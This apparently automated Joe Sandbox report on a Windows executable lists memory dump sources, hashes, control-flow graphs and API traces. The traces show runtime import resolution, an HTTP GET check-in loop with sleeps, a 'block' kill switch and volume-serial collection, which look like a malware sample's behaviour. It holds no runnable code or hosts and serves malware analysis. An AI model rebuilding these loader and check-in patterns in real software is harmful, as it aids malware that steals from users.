                              • Opcode ID: 99d350906a341d19758e8d3dd4c5cc2cf0a413204e18b3aaa5144949364209a6
                              • Instruction ID: bff03a5a25dbb242046f8e00f15d1cf58283692ae8ddae3c7530e143c20c6835
                              • Opcode Fuzzy Hash: 99d350906a341d19758e8d3dd4c5cc2cf0a413204e18b3aaa5144949364209a6
                              • Instruction Fuzzy Hash: 89F04FB1944208ABC714DF98DD49FAEFBB8EB04B11F10066AFA05A2680C77815058BA1
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: c0a0cdc068416041e043b73d888c82198321f1e17b491d90ced5fad3d0a10977
                              • Instruction ID: 357cf1eb6874b1e7e2367cf6b836ae905b301dfd2fbf5755ea3ba40ba410a605
                              • Opcode Fuzzy Hash: c0a0cdc068416041e043b73d888c82198321f1e17b491d90ced5fad3d0a10977
                              • Instruction Fuzzy Hash: C4D05E7490430CDBCB10DFE0DC497EDBB78FB0C711F000555D90562740EA305882CAAA

                              Control-flow Graph
                              control_flow_graph 633 9f9c10-9f9c1a 634 9fa036-9fa0ca LoadLibraryA * 8 633->634 635 9f9c20-9fa031 GetProcAddress * 43 633->635 636 9fa0cc-9fa141 GetProcAddress * 5 634->636 637 9fa146-9fa14d 634->637 635->634 636->637 638 9fa216-9fa21d 637->638 639 9fa153-9fa211 GetProcAddress * 8 637->639 640 9fa21f-9fa293 GetProcAddress * 5 638->640 641 9fa298-9fa29f 638->641 639->638 640->641 642 9fa337-9fa33e 641->642 643 9fa2a5-9fa332 GetProcAddress * 6 641->643 644 9fa41f-9fa426 642->644 645 9fa344-9fa41a GetProcAddress * 9 642->645 643->642 646 9fa428-9fa49d GetProcAddress * 5 644->646 647 9fa4a2-9fa4a9 644->647 645->644 646->647 648 9fa4dc-9fa4e3 647->648 649 9fa4ab-9fa4d7 GetProcAddress * 2 647->649 650 9fa515-9fa51c 648->650 651 9fa4e5-9fa510 GetProcAddress * 2 648->651 649->648 652 9fa612-9fa619 650->652 653 9fa522-9fa60d GetProcAddress * 10 650->653 651->650 654 9fa67d-9fa684 652->654 655 9fa61b-9fa678 GetProcAddress * 4 652->655 653->652 656 9fa69e-9fa6a5 654->656 657 9fa686-9fa699 GetProcAddress 654->657 655->654 658 9fa708-9fa709 656->658 659 9fa6a7-9fa703 GetProcAddress * 4 656->659 657->656 659->658
                              APIs
                              • GetProcAddress.KERNEL32(75900000,013A64C0), ref: 009F9C2D
                              • GetProcAddress.KERNEL32(75900000,013A6640), ref: 009F9C45
                              • GetProcAddress.KERNEL32(75900000,013B8F10), ref: 009F9C5E
                              • GetProcAddress.KERNEL32(75900000,013B8FB8), ref: 009F9C76
                              • GetProcAddress.KERNEL32(75900000,013BCB80), ref: 009F9C8E
                              • GetProcAddress.KERNEL32(75900000,013BCCE8), ref: 009F9CA7
                              • GetProcAddress.KERNEL32(75900000,013AB2E8), ref: 009F9CBF
                              • GetProcAddress.KERNEL32(75900000,013BCB08), ref: 009F9CD7
                              • GetProcAddress.KERNEL32(75900000,013BCD90), ref: 009F9CF0
                              • GetProcAddress.KERNEL32(75900000,013BCDC0), ref: 009F9D08
                              • GetProcAddress.KERNEL32(75900000,013BCDA8), ref: 009F9D20
                              • GetProcAddress.KERNEL32(75900000,013A63C0), ref: 009F9D39
                              • GetProcAddress.KERNEL32(75900000,013A63E0), ref: 009F9D51
                              • GetProcAddress.KERNEL32(75900000,013A6480), ref: 009F9D69
                              • GetProcAddress.KERNEL32(75900000,013A64A0), ref: 009F9D82
                              • GetProcAddress.KERNEL32(75900000,013BCBB0), ref: 009F9D9A
                              • GetProcAddress.KERNEL32(75900000,013BCB98), ref: 009F9DB2
                              • GetProcAddress.KERNEL32(75900000,013AB130), ref: 009F9DCB
                              • GetProcAddress.KERNEL32(75900000,013A6520), ref: 009F9DE3
                              • GetProcAddress.KERNEL32(75900000,013BCB20), ref: 009F9DFB
                              • GetProcAddress.KERNEL32(75900000,013BCD18), ref: 009F9E14
                              • GetProcAddress.KERNEL32(75900000,013BCC40), ref: 009F9E2C
                              • GetProcAddress.KERNEL32(75900000,013BCC70), ref: 009F9E44
                              • GetProcAddress.KERNEL32(75900000,013A6560), ref: 009F9E5D
                              • GetProcAddress.KERNEL32(75900000,013BCBE0), ref: 009F9E75
                              • GetProcAddress.KERNEL32(75900000,013BCBF8), ref: 009F9E8D
                              • GetProcAddress.KERNEL32(75900000,013BCB38), ref: 009F9EA6
                              • GetProcAddress.KERNEL32(75900000,013BCDD8), ref: 009F9EBE
                              • GetProcAddress.KERNEL32(75900000,013BCD00), ref: 009F9ED6
                              • GetProcAddress.KERNEL32(75900000,013BCD30), ref: 009F9EEF
                              • GetProcAddress.KERNEL32(75900000,013BCD48), ref: 009F9F07
                              • GetProcAddress.KERNEL32(75900000,013BCD60), ref: 009F9F1F
                              • GetProcAddress.KERNEL32(75900000,013BCD78), ref: 009F9F38
                              • GetProcAddress.KERNEL32(75900000,013B99D8), ref: 009F9F50
                              • GetProcAddress.KERNEL32(75900000,013BCC88), ref: 009F9F68
                              • GetProcAddress.KERNEL32(75900000,013BCBC8), ref: 009F9F81
                              • GetProcAddress.KERNEL32(75900000,013A6580), ref: 009F9F99
                              • GetProcAddress.KERNEL32(75900000,013BCC10), ref: 009F9FB1
                              • GetProcAddress.KERNEL32(75900000,013A65A0), ref: 009F9FCA
                              • GetProcAddress.KERNEL32(75900000,013BCAF0), ref: 009F9FE2
                              • GetProcAddress.KERNEL32(75900000,013BCB50), ref: 009F9FFA
                              • GetProcAddress.KERNEL32(75900000,013A65C0), ref: 009FA013
                              • GetProcAddress.KERNEL32(75900000,013A6660), ref: 009FA02B
                              • LoadLibraryA.KERNEL32(013BCCB8,?,009F5CA3,00A00AEB,?,?,?,?,?,?,?,?,?,?,00A00AEA,00A00AE3), ref: 009FA03D
                              • LoadLibraryA.KERNEL32(013BCB68,?,009F5CA3,00A00AEB,?,?,?,?,?,?,?,?,?,?,00A00AEA,00A00AE3), ref: 009FA04E
                              • LoadLibraryA.KERNEL32(013BCC28,?,009F5CA3,00A00AEB,?,?,?,?,?,?,?,?,?,?,00A00AEA,00A00AE3), ref: 009FA060
                              • LoadLibraryA.KERNEL32(013BCC58,?,009F5CA3,00A00AEB,?,?,?,?,?,?,?,?,?,?,00A00AEA,00A00AE3), ref: 009FA072
                              • LoadLibraryA.KERNEL32(013BCCA0,?,009F5CA3,00A00AEB,?,?,?,?,?,?,?,?,?,?,00A00AEA,00A00AE3), ref: 009FA083
                              • LoadLibraryA.KERNEL32(013BCCD0,?,009F5CA3,00A00AEB,?,?,?,?,?,?,?,?,?,?,00A00AEA,00A00AE3), ref: 009FA095
                              • LoadLibraryA.KERNEL32(013BCE98,?,009F5CA3,00A00AEB,?,?,?,?,?,?,?,?,?,?,00A00AEA,00A00AE3), ref: 009FA0A7
                              • LoadLibraryA.KERNEL32(013BCE50,?,009F5CA3,00A00AEB,?,?,?,?,?,?,?,?,?,?,00A00AEA,00A00AE3), ref: 009FA0B8
                              • GetProcAddress.KERNEL32(75FD0000,013A66A0), ref: 009FA0DA
                              • GetProcAddress.KERNEL32(75FD0000,013BCE80), ref: 009FA0F2
                              • GetProcAddress.KERNEL32(75FD0000,013B89A0), ref: 009FA10A
                              • GetProcAddress.KERNEL32(75FD0000,013BCEF8), ref: 009FA123
                              • GetProcAddress.KERNEL32(75FD0000,013A67E0), ref: 009FA13B
                              • GetProcAddress.KERNEL32(734B0000,013AB158), ref: 009FA160
                              • GetProcAddress.KERNEL32(734B0000,013A6940), ref: 009FA179
                              • GetProcAddress.KERNEL32(734B0000,013AB180), ref: 009FA191
                              • GetProcAddress.KERNEL32(734B0000,013BCE08), ref: 009FA1A9
                              • GetProcAddress.KERNEL32(734B0000,013BCF70), ref: 009FA1C2
                              • GetProcAddress.KERNEL32(734B0000,013A6820), ref: 009FA1DA
                              • GetProcAddress.KERNEL32(734B0000,013A67C0), ref: 009FA1F2
                              • GetProcAddress.KERNEL32(734B0000,013BCF10), ref: 009FA20B
                              • GetProcAddress.KERNEL32(763B0000,013A69C0), ref: 009FA22C
                              • GetProcAddress.KERNEL32(763B0000,013A6960), ref: 009FA244
                              • GetProcAddress.KERNEL32(763B0000,013BCE20), ref: 009FA25D
                              • GetProcAddress.KERNEL32(763B0000,013BCE38), ref: 009FA275
                              • GetProcAddress.KERNEL32(763B0000,013A67A0), ref: 009FA28D
                              • GetProcAddress.KERNEL32(750F0000,013AAF28), ref: 009FA2B3
                              • GetProcAddress.KERNEL32(750F0000,013AAF50), ref: 009FA2CB
                              • GetProcAddress.KERNEL32(750F0000,013BCF88), ref: 009FA2E3
                              • GetProcAddress.KERNEL32(750F0000,013A69A0), ref: 009FA2FC
                              • GetProcAddress.KERNEL32(750F0000,013A6760), ref: 009FA314
                              • GetProcAddress.KERNEL32(750F0000,013AAF78), ref: 009FA32C
                              • GetProcAddress.KERNEL32(75A50000,013BCEB0), ref: 009FA352
                              • GetProcAddress.KERNEL32(75A50000,013A66E0), ref: 009FA36A
                              • GetProcAddress.KERNEL32(75A50000,013B89C0), ref: 009FA382
                              • GetProcAddress.KERNEL32(75A50000,013BCEC8), ref: 009FA39B
                              • GetProcAddress.KERNEL32(75A50000,013BCF28), ref: 009FA3B3
                              • GetProcAddress.KERNEL32(75A50000,013A66C0), ref: 009FA3CB
                              • GetProcAddress.KERNEL32(75A50000,013A6980), ref: 009FA3E4
                              • GetProcAddress.KERNEL32(75A50000,013BCEE0), ref: 009FA3FC
                              • GetProcAddress.KERNEL32(75A50000,013BCF58), ref: 009FA414
                              • GetProcAddress.KERNEL32(75070000,013A6740), ref: 009FA436
                              • GetProcAddress.KERNEL32(75070000,013BCFA0), ref: 009FA44E
                              • GetProcAddress.KERNEL32(75070000,013BCF40), ref: 009FA466
                              • GetProcAddress.KERNEL32(75070000,013BCDF0), ref: 009FA47F
                              • GetProcAddress.KERNEL32(75070000,013BCE68), ref: 009FA497
                              • GetProcAddress.KERNEL32(74E50000,013A6800), ref: 009FA4B8
                              • GetProcAddress.KERNEL32(74E50000,013A69E0), ref: 009FA4D1
                              • GetProcAddress.KERNEL32(75320000,013A6700), ref: 009FA4F2
                              • GetProcAddress.KERNEL32(75320000,013BC838), ref: 009FA50A
                              • GetProcAddress.KERNEL32(6F270000,013A6840), ref: 009FA530
                              • GetProcAddress.KERNEL32(6F270000,013A68E0), ref: 009FA548
                              • GetProcAddress.KERNEL32(6F270000,013A6A00), ref: 009FA560
                              • GetProcAddress.KERNEL32(6F270000,013BC898), ref: 009FA579
                              • GetProcAddress.KERNEL32(6F270000,013A6680), ref: 009FA591
                              • GetProcAddress.KERNEL32(6F270000,013A6900), ref: 009FA5A9
                              • GetProcAddress.KERNEL32(6F270000,013A6860), ref: 009FA5C2
                              • GetProcAddress.KERNEL32(6F270000,013A6A20), ref: 009FA5DA
                              • GetProcAddress.KERNEL32(6F270000,InternetSetOptionA), ref: 009FA5F1
                              • GetProcAddress.KERNEL32(6F270000,HttpQueryInfoA), ref: 009FA607
                              • GetProcAddress.KERNEL32(74E00000,013BC850), ref: 009FA629
                              • GetProcAddress.KERNEL32(74E00000,013B8950), ref: 009FA641
                              • GetProcAddress.KERNEL32(74E00000,013BC8E0), ref: 009FA659
                              • GetProcAddress.KERNEL32(74E00000,013BC988), ref: 009FA672
                              • GetProcAddress.KERNEL32(74DF0000,013A6720), ref: 009FA693
                              • GetProcAddress.KERNEL32(6F9C0000,013BC8F8), ref: 009FA6B4
                              • GetProcAddress.KERNEL32(6F9C0000,013A6880), ref: 009FA6CD
                              • GetProcAddress.KERNEL32(6F9C0000,013BCA30), ref: 009FA6E5
                              • GetProcAddress.KERNEL32(6F9C0000,013BC9E8), ref: 009FA6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: 5ea91ec6fe6f232418377559b1231c16e090cc97b5e009200987f8770497040b
                              • Instruction ID: 678c28b700bdc4e17f9f938da783d8f63fddecf48a9e823061a75201b277c021
                              • Opcode Fuzzy Hash: 5ea91ec6fe6f232418377559b1231c16e090cc97b5e009200987f8770497040b
                              • Instruction Fuzzy Hash: 32621DB5520200AFC364DFA9EE88B6E37F9F74CB01714852AE609C3A74D7399443DB5A

                              Control-flow Graph
                              control_flow_graph 1033 9e6280-9e630b call 9fa7a0 call 9e47b0 call 9fa740 InternetOpenA StrCmpCA 1040 9e630d 1033->1040 1041 9e6314-9e6318 1033->1041 1040->1041 1042 9e631e-9e6342 InternetConnectA 1041->1042 1043 9e6509-9e6525 call 9fa7a0 call 9fa800 * 2 1041->1043 1045 9e64ff-9e6503 InternetCloseHandle 1042->1045 1046 9e6348-9e634c 1042->1046 1062 9e6528-9e652d 1043->1062 1045->1043 1048 9e634e-9e6358 1046->1048 1049 9e635a 1046->1049 1051 9e6364-9e6392 HttpOpenRequestA 1048->1051 1049->1051 1053 9e6398-9e639c 1051->1053 1054 9e64f5-9e64f9 InternetCloseHandle 1051->1054 1056 9e639e-9e63bf InternetSetOptionA 1053->1056 1057 9e63c5-9e6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1045 1056->1057 1059 9e642c-9e644b call 9f8940 1057->1059 1060 9e6407-9e6427 call 9fa740 call 9fa800 * 2 1057->1060 1067 9e644d-9e6454 1059->1067 1068 9e64c9-9e64e9 call 9fa740 call 9fa800 * 2 1059->1068 1060->1062 1071 9e6456-9e6480 InternetReadFile 1067->1071 1072 9e64c7-9e64ef InternetCloseHandle 1067->1072 1068->1062 1076 9e648b 1071->1076 1077 9e6482-9e6489 1071->1077 1072->1054 1076->1072 1077->1076 1080 9e648d-9e64c5 call 9fa9b0 call 9fa8a0 call 9fa800 1077->1080 1080->1071
                              APIs
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009E4839
                                • Part of subcall function 009E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 009E4849
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              • InternetOpenA.WININET(00A00DFE,00000001,00000000,00000000,00000000), ref: 009E62E1
                              • StrCmpCA.SHLWAPI(?,013BE3C0), ref: 009E6303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009E6335
                              • HttpOpenRequestA.WININET(00000000,GET,?,013BDC98,00000000,00000000,00400100,00000000), ref: 009E6385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009E63BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009E63D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009E63FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009E646D
                              • InternetCloseHandle.WININET(00000000), ref: 009E64EF
                              • InternetCloseHandle.WININET(00000000), ref: 009E64F9
                              • InternetCloseHandle.WININET(00000000), ref: 009E6503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 6738764e9220ff66569fd5fadbd3e8d869510f36ad84b6af6c03762b8995d9ca
                              • Instruction ID: 91d0916dab8dbb82b43cfc4b3b43324a31129a035219ec9f13ae187e728096da
                              • Opcode Fuzzy Hash: 6738764e9220ff66569fd5fadbd3e8d869510f36ad84b6af6c03762b8995d9ca
                              • Instruction Fuzzy Hash: 98716AB1A00218EBDB24EBA0DC49FEE7778BB44740F108198F20A6B5D0DBB46E85CF51

                              Control-flow Graph
                              control_flow_graph 1090 9f5510-9f5577 call 9f5ad0 call 9fa820 * 3 call 9fa740 * 4 1106 9f557c-9f5583 1090->1106 1107 9f55d7-9f564c call 9fa740 * 2 call 9e1590 call 9f52c0 call 9fa8a0 call 9fa800 call 9faad0 StrCmpCA 1106->1107 1108 9f5585-9f55b6 call 9fa820 call 9fa7a0 call 9e1590 call 9f51f0 1106->1108 1134 9f5693-9f56a9 call 9faad0 StrCmpCA 1107->1134 1137 9f564e-9f568e call 9fa7a0 call 9e1590 call 9f51f0 call 9fa8a0 call 9fa800 1107->1137 1124 9f55bb-9f55d2 call 9fa8a0 call 9fa800 1108->1124 1124->1134 1139 9f56af-9f56b6 1134->1139 1140 9f57dc-9f5844 call 9fa8a0 call 9fa820 * 2 call 9e1670 call 9fa800 * 4 call 9f6560 call 9e1550 1134->1140 1137->1134 1142 9f56bc-9f56c3 1139->1142 1143 9f57da-9f585f call 9faad0 StrCmpCA 1139->1143 1271 9f5ac3-9f5ac6 1140->1271 1146 9f571e-9f5793 call 9fa740 * 2 call 9e1590 call 9f52c0 call 9fa8a0 call 9fa800 call 9faad0 StrCmpCA 1142->1146 1147 9f56c5-9f5719 call 9fa820 call 9fa7a0 call 9e1590 call 9f51f0 call 9fa8a0 call 9fa800 1142->1147 1161 9f5865-9f586c 1143->1161 1162 9f5991-9f59f9 call 9fa8a0 call 9fa820 * 2 call 9e1670 call 9fa800 * 4 call 9f6560 call 9e1550 1143->1162 1146->1143 1250 9f5795-9f57d5 call 9fa7a0 call 9e1590 call 9f51f0 call 9fa8a0 call 9fa800 1146->1250 1147->1143 1167 9f598f-9f5a14 call 9faad0 StrCmpCA 1161->1167 1168 9f5872-9f5879 1161->1168 1162->1271 1197 9f5a28-9f5a91 call 9fa8a0 call 9fa820 * 2 call 9e1670 call 9fa800 * 4 call 9f6560 call 9e1550 1167->1197 1198 9f5a16-9f5a21 Sleep 1167->1198 1175 9f587b-9f58ce call 9fa820 call 9fa7a0 call 9e1590 call 9f51f0 call 9fa8a0 call 9fa800 1168->1175 1176 9f58d3-9f5948 call 9fa740 * 2 call 9e1590 call 9f52c0 call 9fa8a0 call 9fa800 call 9faad0 StrCmpCA 1168->1176 1175->1167 1176->1167 1276 9f594a-9f598a call 9fa7a0 call 9e1590 call 9f51f0 call 9fa8a0 call 9fa800 1176->1276 1197->1271 1198->1106 1250->1143 1276->1167
                              APIs
                                • Part of subcall function 009FA820: lstrlen.KERNEL32(009E4F05,?,?,009E4F05,00A00DDE), ref: 009FA82B
                                • Part of subcall function 009FA820: lstrcpy.KERNEL32(00A00DDE,00000000), ref: 009FA885
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009F5644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009F56A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009F5857
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009F51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009F5228
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009F52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009F5318
                                • Part of subcall function 009F52C0: lstrlen.KERNEL32(00000000), ref: 009F532F
                                • Part of subcall function 009F52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 009F5364
                                • Part of subcall function 009F52C0: lstrlen.KERNEL32(00000000), ref: 009F5383
                                • Part of subcall function 009F52C0: lstrlen.KERNEL32(00000000), ref: 009F53AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009F578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009F5940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009F5A0C
                              • Sleep.KERNEL32(0000EA60), ref: 009F5A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 9aecec9ec92a63d53ec67bb8c78045c5ed498538714532fc0a2155fc1eadcd61
                              • Instruction ID: 1793064ac08371918f9ec5f491348bfdb9f55309b19248cd61f462aad80bb31b
                              • Opcode Fuzzy Hash: 9aecec9ec92a63d53ec67bb8c78045c5ed498538714532fc0a2155fc1eadcd61
                              • Instruction Fuzzy Hash: 1FE11FB191010CABCB14FBA0DC56FFD737CAF94340F508528B60A66595EF74AE0ACB92

                              Control-flow Graph

                              • Control-flow graph of function 9f17a0 (basic blocks 9f17a0-9f19cd; graph figure not preserved)
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 009F17C5
                              • ExitProcess.KERNEL32 ref: 009F17D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: f294d5e7953545263d91f63749cc2605c4dda2308adf2fa680a2a066a133a7d4
                              • Instruction ID: b19c6192273763d6f89f23733870a63bde05b277c9aaee016ce4bffc8d968caa
                              • Opcode Fuzzy Hash: f294d5e7953545263d91f63749cc2605c4dda2308adf2fa680a2a066a133a7d4
                              • Instruction Fuzzy Hash: 8F5150B4A1420DEFCB04DFA0E994BBE77B5BF44704F104449E605A7380D7B5E992DBA2

                              Control-flow Graph

                              • Control-flow graph of function 9f7500 (basic blocks 9f7500-9f768e; graph figure not preserved)
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 009F7542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009F757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009F7603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F760A
                              • wsprintfA.USER32 ref: 009F7640
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: c6ef856b0e9e7a72246a9ade730e39dc41168ad15550aa4a375156bf7e9e07da
                              • Instruction ID: d7da9e45cf139f71ce956e81fd9c20d5bcf7d69e18a503d4bdc578dd4b9cf035
                              • Opcode Fuzzy Hash: c6ef856b0e9e7a72246a9ade730e39dc41168ad15550aa4a375156bf7e9e07da
